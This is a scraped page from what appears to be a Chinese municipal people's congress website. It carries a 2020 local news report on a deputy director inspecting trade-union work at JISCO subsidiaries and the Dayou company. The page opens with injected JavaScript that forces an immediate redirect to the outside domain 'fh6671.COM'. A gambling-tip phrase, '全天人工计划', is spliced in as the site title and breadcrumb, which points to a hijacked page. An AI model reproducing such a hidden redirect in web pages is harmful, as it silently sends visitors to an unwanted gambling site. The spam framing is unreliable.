function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

全天人工计划


欢迎您登录嘉峪关人大网站!
当前位置:全天人工计划  >>  新工作动态  >>  监督纵横  >>  工作监督  
唐晓东调研酒钢、大友公司工会工作
来源: 嘉峪关日报      日期: 2020-08-31      作者: 雷昉谕      点击数:

唐晓东调研酒钢、大友公司工会工作

 嘉峪关日报讯(记者 雷昉谕)8月27日,市人大常委会副主任唐晓东先后来到酒钢集团东兴铝业、酒钢集团宏兴股份公司炼轧厂和嘉峪关大友企业公司调研企业工会工作开展情况,酒钢集团公司党委副书记、工会主席任建民一同调研。

 在东兴铝业,唐晓东实地观摩了电解铝全产业链建设情况并参观了先进劳动模范王小康工作室;在宏兴股份公司炼轧厂,唐晓东出席了“夏送清凉”活动仪式,看望慰问了高温岗位职工并举行座谈会,详细了解炼轧厂生产经营状况和工会工作开展情况;在大友企业公司,唐晓东深入福利劳保服装厂服装生产线和大友嘉能化工生产线,实地了解公司运营情况,倾听企业职工对市总工会的需求期盼及意见建议。

 唐晓东要求,企业工会要发挥主力军作用,引导职工积极建功立业,参与企业发展和建设,更多地关心关爱职工,开展丰富多彩的文体活动,帮扶救助困难职工,争创职工信赖的职工之家,争当职工信赖的“娘家人”“贴心人”“引路人”。